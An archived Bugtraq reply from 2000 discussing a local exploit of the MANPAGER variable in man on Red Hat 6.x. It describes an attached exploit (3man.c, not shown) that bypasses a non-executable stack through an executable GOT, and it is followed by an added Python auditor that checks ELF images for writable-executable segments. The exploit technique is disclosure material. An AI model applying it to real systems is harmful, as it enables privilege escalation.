[14694] in bugtraq


Re: man-exploit for MANPAGER environment...

daemon@ATHENA.MIT.EDU (Mariusz Woloszyn)
Wed Apr 26 22:20:49 2000

Mime-Version: 1.0
Content-Type: MULTIPART/MIXED; BOUNDARY="429728448-1351432301-956737726=:19576"
Message-Id:  <Pine.LNX.4.04.10004261021470.19576-200000@dzyngiel.ipartners.pl>
Date:         Wed, 26 Apr 2000 10:28:46 +0200
Reply-To: Mariusz Woloszyn <emsi@IT.PL>
From: Mariusz Woloszyn <emsi@IT.PL>
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To:  <19033.956566296@www4.gmx.net>

On Mon, 24 Apr 2000 psychoid@GMX.NET wrote:

> For the sake of full disclosure an exploit for the MANPAGER environment
> variable:
>
> - snip -
>
> /*
>  * MAN-Exploit for MANPAGER environmental variable.
>  * rh 6.x, tested on rh 6.1
>  * written by psychoid/tCl
>  * gives egid man.
>  *
>  * Originally discovered by lcamtuf.
>  * educational. yes.
>  *
>  */
>

For absolutely FULL disclosure here is a wonderful man sploit (already
posted to vuln-dev in thread of sth...) that works cool even if stack is
nonexecutable (it exploits the feature of GOT being executable -- see
vuln-dev archives for details:
http://www.securityfocus.com/templates/archive.pike?list=82&date=2000-04-15&msg=Pine.GSO.4.03.10004201510040.12388-100000@zloty.it.com.pl).

GreetZ Bulba, Lam3rZ, teso, hert, Smerda Jajeczny.

Kil3r / Emsi / M.C.Mar /

--
Mariusz Wołoszyn
Internet Security Specialist, Internet Partners, GTS Poland

[Attachment: 3man.c]
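
The reply's point is that a non-executable stack alone does not stop an exploit when another region, here the GOT, is still executable. As an added example (not part of the original post or its 3man.c attachment), the Python below audits a 32-bit little-endian ELF image for that condition on systems where segment permissions are enforced: it flags any PT_LOAD segment that is both writable and executable, and a PT_GNU_STACK header that requests an executable stack. Assumptions: the function and sample names are hypothetical, the sample images are constructed, and the check generalizes the GOT case to any writable and executable segment.

```python
import struct

PT_LOAD, PT_GNU_STACK = 1, 0x6474E551
PF_X, PF_W = 1, 2

def audit_elf32(image):
    """Return a list of findings for a 32-bit little-endian ELF image."""
    if image[:4] != b"\x7fELF" or image[4:6] != b"\x01\x01":
        raise ValueError("not a 32-bit little-endian ELF image")
    # Elf32_Ehdr: e_phoff at offset 28, e_phentsize/e_phnum at 42/44.
    (e_phoff,) = struct.unpack_from("<I", image, 28)
    e_phentsize, e_phnum = struct.unpack_from("<HH", image, 42)
    findings, saw_stack = [], False
    for i in range(e_phnum):
        # Elf32_Phdr: type, offset, vaddr, paddr, filesz, memsz, flags, align
        p_type, _, p_vaddr, _, _, _, p_flags, _ = struct.unpack_from(
            "<8I", image, e_phoff + i * e_phentsize)
        if p_type == PT_LOAD and p_flags & PF_W and p_flags & PF_X:
            # Writable data segment (where a non-RELRO GOT lives) is also executable.
            findings.append(f"writable+executable PT_LOAD at {p_vaddr:#x}")
        elif p_type == PT_GNU_STACK:
            saw_stack = True
            if p_flags & PF_X:
                findings.append("executable stack requested")
    if not saw_stack:
        findings.append("no PT_GNU_STACK header, stack policy left to loader default")
    return findings

def build_sample(phdrs):
    """Constructed image: ELF32 header plus (type, vaddr, flags) program headers."""
    ehdr = b"\x7fELF\x01\x01\x01" + bytes(9) + struct.pack(
        "<HHIIIIIHHHHHH", 2, 3, 1, 0, 52, 0, 0, 52, 32, len(phdrs), 0, 0, 0)
    return ehdr + b"".join(
        struct.pack("<8I", t, 0, va, va, 0, 0, fl, 0x1000) for t, va, fl in phdrs)

# Constructed samples: both mark the stack non-executable (flags 6 = RW),
# but WEAK maps its data segment RWX (flags 7), the case the reply describes.
HARDENED = build_sample([(PT_LOAD, 0x08048000, 5), (PT_LOAD, 0x08049000, 6),
                         (PT_GNU_STACK, 0, 6)])
WEAK = build_sample([(PT_LOAD, 0x08048000, 5), (PT_LOAD, 0x08049000, 7),
                     (PT_GNU_STACK, 0, 6)])

if __name__ == "__main__":
    for name, img in (("HARDENED", HARDENED), ("WEAK", WEAK)):
        print(name, audit_elf32(img) or "no findings")
```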
